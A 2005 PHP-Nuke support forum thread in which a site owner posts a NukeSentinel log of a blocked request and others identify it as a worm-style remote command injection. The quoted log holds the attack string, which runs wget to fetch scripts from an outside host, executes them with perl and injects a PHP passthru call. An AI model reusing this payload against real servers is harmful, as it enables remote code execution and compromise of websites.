Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™
Author Message
ring_c
Involved
Involved


Joined: Dec 28, 2003
Posts: 276
Location: Israel

PostPosted: Mon Dec 19, 2005 12:02 am Reply with quote

I'm getting too many of these lately.
A. Is this ok?
B. If so, is there any way I can make Sentinel avoide it?

TIA!

=================================

Date & Time: 2005-12-18 12:52:49 EST GMT -0500
Blocked IP: 68.142.250.146
User ID: guest (1)
Reason: Abuse-Script
--------------------
User Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; Only registered users can see links on this board! Get registered or login!
Query String: Only registered users can see links on this board! Get registered or login!
Get String: Only registered users can see links on this board! Get registered or login! _START_; CD/VAR/TMP;WGETWWW.VESDO.NL/CACHE/FRAME3.TXT;WGETWWW.VESDO.NL/CACHE/FRAME2.TXT;PERLFRAME3.TXT;RMFRAME3.TXT;PERLFRAME2.TXT;RMFRAME2.TXT; ECHO _END_&HIGHLIGHT='.PASSTHRU($HTTP_GET_VARS[RUSH]).'
Post String: Only registered users can see links on this board! Get registered or login!
Forwarded For: none
Client IP: none
Remote Address: 68.142.250.146
Remote Port: 34165
Request Method: GET
 
View user's profile Send private message Visit poster's website
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Mon Dec 19, 2005 8:00 am Reply with quote

well,to what i could find about it that it is an attack ,but because of the variety of types it couldnt point out the exact one.....im not sure.but it uses another site like vesdo..
It addresses the mailserver,phpbb,or even coppermine.
But a reply i found said also..."Looks like a variant of the santy worm to me, that also used LWP::Simple"

And that had the same contents of what you posted...Sad
 
View user's profile Send private message
ring_c
PostPosted: Mon Dec 19, 2005 8:53 am Reply with quote

Gee, you got me now hitwalker!
I was certain that's not an attack! gee...

Well, if NukeSentinel recognize it, do I have anything to fear from?
 
hitwalker
PostPosted: Mon Dec 19, 2005 9:08 am Reply with quote

well dont take my word completely,i searched over and over with google using full lines of your post...
one thing is certain and that its described as an attach of gaining......whatever access to whatever...
Im not gonna post anything by making things up....
also a thing to keep in mind is that a lot of sites were abused remotely because some things on their server were vunerable.
but the abusive links to be used for other hackers are spread around but never "updated".
The site abused for whatever reason is vesdo.nl,and your attack lines are targeted for sites using phpbb,coppermine etc....and vesdo is a mambo cms site,and could easely be an old abused address still available in the search engines.
The combining urls you see with vesdo dont excist.
As you said..sentinel stopped it so no worries...
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Mon Dec 19, 2005 11:54 pm Reply with quote

Yes, it is a cross-site scripting attack. WGet is a command to get something from the other server.. in this case at the vesdo.nl address. You'd probably find some nasty code in there to further compromise your system.

What I don't understand is that this IP is coming from Yahoo's Inktomi search engine. So someone is trying to hide their current IP probably.

You may need to contact the vesdo.nl server admins too, to see if you can get things removed from their server

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
ring_c
PostPosted: Tue Dec 20, 2005 1:58 am Reply with quote

Evaders99, thank you.
I've addressed vesdo.nl's site owner/manager and added a link to this thread. maybe he'll want to explain something to us...
 
hitwalker
PostPosted: Tue Dec 20, 2005 5:51 am Reply with quote

well i already did leave a message on his answering machine and maild him,no sign of life yet....
how greatfull some people are... Evil or Very Mad
 
ring_c
PostPosted: Tue Dec 20, 2005 8:59 am Reply with quote

hitwalker, is there anything we can do without him?
Should we address Yahoo! as well?
 
hitwalker
PostPosted: Tue Dec 20, 2005 9:13 am Reply with quote

No...
I already had a phonecall with the owner of the dutch site an hour ago.. Smile.
He will be contacting his host to see if they can look into this as well.
They can check more then we can,its interesting to see what it is exactly and why his domain is used.
But i know a litle bit what the attackers intention was.
they wanted to use the cache of mambo.
If you look at the url you see its written like ..CACHE,well that doesnt excist.
But cache...does,thats simply from mambo itself....and something that can be turned on or off.

But mailing yahoo is realy useless..that company is born deaf and blind..
 
ring_c
PostPosted: Tue Dec 20, 2005 9:29 am Reply with quote

hitwalker wrote:
But i know a litle bit what the attackers intention was.
they wanted to use the cache of mambo.
If you look at the url you see its written like ..CACHE,well that doesnt excist.

What were they trying to do to my site? can you tell?
 
hitwalker
PostPosted: Tue Dec 20, 2005 9:40 am Reply with quote

well only thing we know is that the commands they used are to get access..
But what exactly is hard to say but it comes to this....script kiddies build something that uses wget on the server side to download an IRC bot or rootkit.
wget will be called by passing it's name among a URL and probably some compiler, tar, mkdir, .. commands to an exploitable script on your server.
then you find wget in the query strings in your log files.

a litle bit of info i gathered..
but ill reply here again as i get a response again from that guy's website.
 
ring_c
PostPosted: Wed Dec 21, 2005 12:13 am Reply with quote

Thanks for everything, hitwalker...
 
hitwalker
PostPosted: Wed Dec 21, 2005 2:49 pm Reply with quote

well he got a reply and maild it but unfortunately with not that much info.
The detected a few things as well but didnt tell exactly what...,they did told him not to use the cache anymore...so thats it..
 
ring_c
PostPosted: Wed Dec 21, 2005 2:58 pm Reply with quote

Hmmm... dissapointing.. Sad
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©